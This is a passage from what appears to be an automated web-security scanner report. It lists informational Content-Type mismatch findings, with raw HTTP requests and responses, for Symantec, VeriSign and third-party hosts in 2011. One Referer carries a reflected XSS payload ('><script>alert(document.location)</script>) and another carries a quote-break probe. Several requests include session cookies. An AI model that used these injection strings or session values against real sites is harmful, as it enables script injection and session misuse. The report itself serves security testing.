Host: https://fileconnect.symantec.com
Path: /images/Sigstand.jpg
Issue detail
The response contains the following Content-type statement: The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.
Request
GET /images/Sigstand.jpg HTTP/1.1 Host: fileconnect.symantec.com Connection: keep-alive Referer: https://fileconnect.symantec.com/licenselogin.jsp?localeStr=en_USba9ab%22%3b528b7643cdb User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20s_nr%3D1315622498618-New%7C1336358498618%3B%20event69%3Devent69%7C1336358498621%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20init_search%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520categories%2525253A%25252520security%2525252C%25252520backup%25252520%25252526%25252520archiving%2525252C%25252520server%25252520management%2525252C%25252520and%25252520storage%25252520software%25252520%2525257C%25252520symantec%25252520enterprise%25252520products%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den%25252Fus%2525253ASMBStore%2525253ALRC%2525253AChat%25252520Form%252526pidt%25253D1%252526oid%25253Dmailto%2525253Asales%252540symantecsmbrenewals.com%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 22:03:56 GMT Content-length: 2534 Content-type: image/jpeg Last-Modified: Sat, 21 May 2011 05:26:42 GMT Accept-Ranges: bytes GIF89a..%..........ddd........k..............................oR.........VCCC...]]]$$$.................3...222..,...<<<......vvv......XXX+++...............mmmppp.....{UUU...yyy.....D.........jjj..&.......[SNIP]...
23.25. http://free.pctools.com/favicon.ico
Summary
Severity: Information
Confidence: Firm
Host: http://free.pctools.com
Path: /favicon.ico
Issue detail
The response contains the following Content-type statement:
Content-Type: text/plain; charset=UTF-8
The response states that it contains plain text. However, it actually appears to contain unrecognised content.
Request
GET /favicon.ico HTTP/1.1 Host: free.pctools.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: reftrack=freesite%2320110909170147; PHPSESSID=68o0726o7nflfg28ire9iju5j2; __utma=9079138.240734855.1315623957.1315623957.1315623957.1; __utmb=9079138.1.10.1315623957; __utmc=9079138; __utmz=9079138.1315623957.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=1.1056361608.1315623957.1315623957.1315623957.1; __utmb=1.0.10.1315623957; __utmc=1; __utmz=1.1315623957.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName
Response
HTTP/1.1 200 OK Server: Apache Last-Modified: Tue, 07 Dec 2010 03:15:40 GMT ETag: "738b5b-57e-496c96b526f00" Accept-Ranges: bytes Content-Length: 1406 Content-Type: text/plain; charset=UTF-8 Date: Fri, 09 Sep 2011 22:05:57 GMT Connection: close ..............h.......(....... .................................\...............6.......M...G...H...[.......5.......U...........X...J...3...k...i...W...O.......?...i...W...|...............K...K..........[SNIP]...
23.26. http://gs.instantservice.com/geoipAPI.js
Summary
Severity: Information
Confidence: Firm
Host: http://gs.instantservice.com
Path: /geoipAPI.js
Issue detail
The response contains the following Content-type statement:
Content-Type: text/javascript; charset=utf-8
The response states that it contains script. However, it actually appears to contain plain text.
Request
GET /geoipAPI.js?src=ii3&ts=1315621724 HTTP/1.1 Host: gs.instantservice.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/partners/ssl-reseller-programs/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:28:14 GMT Server: Apache P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Content-Length: 355 Connection: close Content-Type: text/javascript; charset=utf-8 isgeoipapi_continent_code = "NA";isgeoipapi_country_code = "US";isgeoipapi_country_name = "United States";isgeoipapi_region = "TX";isgeoipapi_city = "Dallas";isgeoipapi_dma_code = "623";isgeoipapi_are...[SNIP]...
23.27. https://idprotect.verisign.com/common/scripts/dlText.js
Summary
Severity: Information
Confidence: Firm
Host: https://idprotect.verisign.com
Path: /common/scripts/dlText.js
Issue detail
The response contains the following Content-type statement:
Content-Type: text/javascript
The response states that it contains script. However, it actually appears to contain HTML.
Request
GET /common/scripts/dlText.js HTTP/1.1 Host: idprotect.verisign.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://idprotect.verisign.com/orderstart.v Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:50:57 GMT Accept-Ranges: bytes ETag: W/"19229-1310089722000" Last-Modified: Fri, 08 Jul 2011 01:48:42 GMT Content-Type: text/javascript Content-Length: 19229 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive linkData['DL_0'] = 'Supported Mobile Devices'; linkData['DL_1'] = 'Select Your Mobile Device'; linkData['DL_2'] = 'Why You Have To Download, Activate, and Register Your ' + brand_productname; linkData...[SNIP]...
23.28. https://idprotect.verisign.com/imageapp.v
Summary
Severity: Information
Confidence: Firm
Host: https://idprotect.verisign.com
Path: /imageapp.v
Issue detail
The response contains the following Content-type statement: The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.
Request
GET /imageapp.v?Image=tmobile_de HTTP/1.1 Host: idprotect.verisign.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://idprotect.verisign.com/wheretouse.v Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:51:34 GMT Content-Disposition: filename=getimage.jpeg Content-Type: image/jpeg Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 491 GIF89a..2........................................o.._..`..P..@..?..0.. z..q..g..............................!.......,......2.... .di.h..l..p,.tm.x..|....pH,....r.l:...tJ.Z...v..z...xL.......n..m.:.v...[SNIP]...
23.29. https://idprotect.verisign.com/membersites.v
Summary
Severity: Information
Confidence: Firm
Host: https://idprotect.verisign.com
Path: /membersites.v
Issue detail
The response contains the following Content-type statement: The response states that it contains plain text. However, it actually appears to contain JSON.
Request
GET /membersites.v?DATA={REGION:ALL,CATEGORY:FEATURED_ONLY,ACCOUNT_TYPE:ALL} HTTP/1.1 Host: idprotect.verisign.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: application/json, text/javascript, */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive X-Requested-With: XMLHttpRequest Referer: https://idprotect.verisign.com/wheretouse.v Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:50:53 GMT Cache-Control: no-cache Pragma: no-cache Content-Length: 7124 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/plain [{"id":27323,"logoImage":null,"isPartner":0,"description":"Merrill Lynch","isFeatured":1,"name":"merrilllynch","hasImageLogo":1,"displayOrder":1,"webLink":"http://www.ml.com/","code":"merrilllynch","b...[SNIP]...
23.30. https://knowledge.verisign.com/favicon.ico
Summary
Severity: Information
Confidence: Firm
Host: https://knowledge.verisign.com
Path: /favicon.ico
Issue detail
The response contains the following Content-type statement: The response states that it contains plain text. However, it actually appears to contain unrecognised content.
Request
GET /favicon.ico HTTP/1.1 Host: knowledge.verisign.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=0BA75884D1245C296CF5414E376DC3FC; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621628|session#1315621455064-973488#1315623428|PC#1315621455064-973488.19#1378693568
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache Last-Modified: Thu, 18 Aug 2011 11:31:30 GMT ETag: "342ce-47e-4aac5f440a880" Accept-Ranges: bytes Content-Length: 1150 Keep-Alive: timeout=15 Connection: Keep-Alive Content-Type: text/plain ............ .h.......(....... ..... .....@......................................>...........................................................q...................................9.........................[SNIP]...
23.31. http://mbox3.offermatica.com/m2/verisign/mbox/standard
Summary
Severity: Information
Confidence: Firm
Host: http://mbox3.offermatica.com
Path: /m2/verisign/mbox/standard
Issue detail
The response contains the following Content-type statement:
Content-Type: text/javascript
The response states that it contains script. However, it actually appears to contain plain text.
Request
GET /m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621506825-922680&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_HP_AccBox_2011&mboxId=0&mboxURL=http%3A//www.verisign.com/&mboxReferrer=&mboxVersion=31 HTTP/1.1 Host: mbox3.offermatica.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mboxPC=1315621455064-973488.19
Response
HTTP/1.1 200 OK P3P: CP="NOI DSP CURa OUR STP COM" Set-Cookie: mboxPC=1315621455064-973488.19; Domain=offermatica.com; Expires=Sun, 09-Oct-2011 21:24:38 GMT; Path=/m2/verisign Content-Type: text/javascript Content-Length: 154 Date: Fri, 09 Sep 2011 21:24:37 GMT Server: Test & Target mboxFactoryDefault.get('VRSN_HP_AccBox_2011',0).setOffer(new mboxOfferDefault()).loaded();mboxFactoryDefault.getPCId().forceId("1315621455064-973488.19");
23.32. http://partnerlocator.symantec.com/public/product_finder
Summary
Severity: Information
Confidence: Firm
Host: http://partnerlocator.symantec.com
Path: /public/product_finder
Issue detail
The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain XML.
Request
GET /public/product_finder HTTP/1.1 Host: partnerlocator.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.54 Date: Fri, 09 Sep 2011 21:45:58 GMT Content-Type: text/html Connection: close Content-Length: 34 <h1>500 Internal Server Error</h1>
23.33. http://partnerlocator.symantec.com/public/pulldown_list
Summary
Severity: Information
Confidence: Firm
Host: http://partnerlocator.symantec.com
Path: /public/pulldown_list
Issue detail
The response contains the following Content-type statement:
Content-Type: text/html; charset=UTF-8
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /public/pulldown_list;plist=country;search_term=usa;country=;locale=en-us;container=pulldown_list;value_id=country;text_id=country_name HTTP/1.1 Host: partnerlocator.symantec.com Proxy-Connection: keep-alive Referer: http://partnerlocator.symantec.com/public/search X-Prototype-Version: 1.5.0 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; s_pers=%20s_nr%3D1315622094388-New%7C1336358094388%3B%20event69%3Devent69%7C1336358094390%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/10; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3Dsymanteccom%252Cveritasnonconsumer%252Csymantecpartner%253D%252526pid%25253Den/us%2525253A%25252520plocator%2525253A%25252520public%2525253A%25252520select%25252520country%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bhide_initial_text_new%25252528%25252527country_name%25252527%2525252C%25252527country%25252527%25252529%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den/us%2525253ASMBStore%2525253ALRC%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AfindReseller%25252528%25252527http%2525253A//partnerlocator.symantec.com/public/search%25252527%25252529%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Server: nginx/0.8.54 Date: Fri, 09 Sep 2011 21:37:48 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive Content-Size: 20 Content-Length: 20 No Matching Partners
23.34. http://player.ooyala.com/info/primary/
Summary
Severity: Information
Confidence: Firm
Host: http://player.ooyala.com
Path: /info/primary/
Issue detail
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /info/primary/ HTTP/1.1 Host: player.ooyala.com Proxy-Connection: keep-alive Referer: http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819
Response
HTTP/1.1 200 OK Content-Type: text/html Content-Length: 381 Date: Fri, 09 Sep 2011 21:25:47 GMT Connection: close Vary: Accept-Encoding LyG84k55cH2qqKsCKThF9pIijz6kuooWXzBwi9wecPfEPAb+op9VqIT30K4Omw9FS2j9ClUiAsNd8muh3VILcB/oegr3a9DNHzbEfr7bY7e6ft43EYvUZ6Z/M4aTleS1sueeKUT5r1E1J565p/d9dd+RujgJ9ulqu6caTPLzBBFWjbj7inLKstRg2gNeQtI6MOQvakLZ...[SNIP]...
23.35. http://player.ooyala.com/sas/authorized
Summary
Severity: Information
Confidence: Firm
Host: http://player.ooyala.com
Path: /sas/authorized
Issue detail
The response contains the following Content-type statement:
Content-Type: text/xml
The response states that it contains XML. However, it actually appears to contain script.
Request
GET /sas/authorized?analytics%5Fparams=%7B%22pcode%22%3A%22w1c2U6fqVnqafrMhiALawYi9UUck%22%7D&token=AA%2DqZeKXlu6K%2D004e6a82e2%2DpV6aaVTozOYv5jDhwDiyHvickxVNrKeSqY%2E6lHZYpEk&domain=www%2Everisign%2Ecom&embed%5Fcode%5Flist=w0NmJhMTqAVBik2%2DmvMAlw7lBOLLrNpG&timestamp=1315621597961&parent%5Fauthorized=true&signature=gKOWJocIDV592zgrbyHmOsSN4fTOnBy1%2FCAEHtU5LWI&device=WIN%2010%2C3%2C183%2C7 HTTP/1.1 Host: player.ooyala.com Proxy-Connection: keep-alive Referer: http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819
Response
HTTP/1.1 200 OK Status: 200 OK Content-Type: text/xml Content-Length: 716 Cache-Control: public, no-cache Date: Fri, 09 Sep 2011 21:26:08 GMT Connection: close iIDd0cueavrMh4p7kKVwfDcKB+ydo50WBbUtMLcgvZOMV/yRRHo/BjHe7Ytn h3ltGU20Y0cCg8XVm0HlhUPMdTKA+JkrJ5pAHN/j9mrAIR/Jw56Ch+2AScL9 kbgM6ukGT0KwlzosaQtFwR5wEFC0kFnQVUo+wQnxNvAdBozZlJHBiYVlg2SO JotiY/UdyOFK+TiH1...[SNIP]...
23.36. http://query.verisign.com/cluster
Summary
Severity: Information
Confidence: Firm
Host: http://query.verisign.com
Path: /cluster
Issue detail
The response contains the following Content-type statement:
Content-Type: text/javascript; charset=utf-8
The response states that it contains script. However, it actually appears to contain unrecognised content.
Request
POST /cluster?coutput=json&q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend&ie=UTF-8&ip=10.244.28.108&access=p&sort=date%3AD%3AL%3Ad1&entqr=1&entsp=0&oe=UTF-8&ud=1 HTTP/1.1 Host: query.verisign.com Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend Content-Length: 0 Origin: http://query.verisign.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Content-Type: application/x-www-form-urlencoded Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Content-Type: text/javascript; charset=utf-8 Cache-Control: max-age=900 Expires: Fri, 09 Sep 2011 21:41:10 GMT Content-Length: 3685 {"clusters": [ ], "documents": [ { "url": "https://knowledge.verisign.com/support/mpki-for-ssl-support/index?page=content&id=AR1295&pmv=print&actp=PRINT&viewlocale=fr_FR", "title": "Ve...[SNIP]...
23.37. http://sales.liveperson.net/hcp/html/mTag.js
Summary
Severity: Information
Confidence: Firm
Host: http://sales.liveperson.net
Path: /hcp/html/mTag.js
Issue detail
The response contains the following Content-type statement:
Content-Type: application/x-javascript
The response states that it contains script. However, it actually appears to contain unrecognised content.
Request
GET /hcp/html/mTag.js?site=71097838 HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://www.symantec.com/business/theme.jsp?themeid=contact-verisign User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315578244934
Response
HTTP/1.1 200 OK Content-Length: 17291 Content-Type: application/x-javascript Content-Location: http://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=71097838 Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT Accept-Ranges: bytes ETag: "e0f243e4cde1cb1:1efe" Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Date: Fri, 09 Sep 2011 21:26:51 GMT eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][...[SNIP]...
23.38. https://seal.verisign.com/getseal
Summary
Severity: Information
Confidence: Firm
Host: https://seal.verisign.com
Path: /getseal
Issue detail
The response contains the following Content-type statement:
Content-Type: text/javascript
The response states that it contains script. However, it actually appears to contain plain text.
Request
GET /getseal HTTP/1.1 Host: seal.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0, must-revalidate ETag: Content-Type: text/javascript Date: Fri, 09 Sep 2011 21:46:24 GMT Connection: close <!-- x=1; -->
23.39. http://sr2.liveperson.net/hcp/html/mTag.js
Summary
Severity: Information
Confidence: Firm
Host: http://sr2.liveperson.net
Path: /hcp/html/mTag.js
Issue detail
The response contains the following Content-type statement:
Content-Type: application/x-javascript
The response states that it contains script. However, it actually appears to contain unrecognised content.
Request
GET /hcp/html/mTag.js?site=71097838 HTTP/1.1 Host: sr2.liveperson.net Proxy-Connection: keep-alive Referer: http://www.symantec.com/store/resources/index.jsp?inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: LivePersonID=LP i=5110247826455,d=1314795678
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Content-Location: http://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=71097838 Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT Accept-Ranges: bytes ETag: "e0f243e4cde1cb1:27d6" Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 17291 Date: Fri, 09 Sep 2011 21:31:14 GMT Connection: close eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][...[SNIP]...
23.40. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico
Summary
Severity: Information
Confidence: Firm
Host: http://www.symantec.com
Path: /connect/sites/default/themes/connect2/images/favicon.ico
Issue detail
The response contains the following Content-type statement:
Content-Type: text/plain; charset=UTF-8
The response states that it contains plain text. However, it actually appears to contain unrecognised content.
Request
GET /connect/sites/default/themes/connect2/images/favicon.ico HTTP/1.1 Host: www.symantec.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%2520site%253Awww.symantec.com%252Fconnect%252Fblogs%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fsearchg.symantec.com%2525252Fsearch%2525253Fas_sitesearch%2525253Dwww.symantec.com%2525252Fconnect%2525252Fblogs%25252526q%2525253Dxss%25252526charset%2525253Dutf-8%25252526proxystylesheet%2525253Dsymc_en_US%25252526client%2525253Dsymc_en_US%25252526hitsceil%2525253D100%25252526site%2525253Dsymc_en_US%25252526output%2525253Dxml_no_dtd%25252526context%2525253Dent%25252526x%2525253D0%25252526y%2525253D0%25252526ie%2525253DUTF-8%25252526ip%2525253D50.23.123.106%25252526access%2525253Dp%25252526sort%2525253Ddat%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%252526ot%25253DA%2526veritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622057794-New%7C1336358057794%3B%20event69%3Devent69%7C1336358057796%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (Red Hat) Last-Modified: Tue, 05 Oct 2010 02:54:35 GMT ETag: "a680e3-47e-491d5c7eb70c0" Content-Type: text/plain; charset=UTF-8 X-Varnish: 312037258 Vary: Accept-Encoding Content-Length: 1150 Cache-Control: max-age=18988 Date: Fri, 09 Sep 2011 21:34:12 GMT Connection: close ............ .h.......(....... ..... .....@......................................>...........................................................q...................................9.........................[SNIP]...
23.41. http://www.symantec.com/s/searchg/suggest
Summary
Severity: Information
Confidence: Firm
Host: http://www.symantec.com
Path: /s/searchg/suggest
Issue detail
The response contains the following Content-type statement:
Content-Type: text/plain; charset=utf-8
The response states that it contains plain text. However, it actually appears to contain JSON.
Request
GET /s/searchg/suggest?q=xss&max=10&site=symc_en_US&client=symc_en_US&access=p&format=rich HTTP/1.1 Host: www.symantec.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps6ed59%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0e8182bf4be Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%252Cveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622023420-New%7C1336358023420%3B%20event69%3Devent69%7C1336358023421%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]
Response
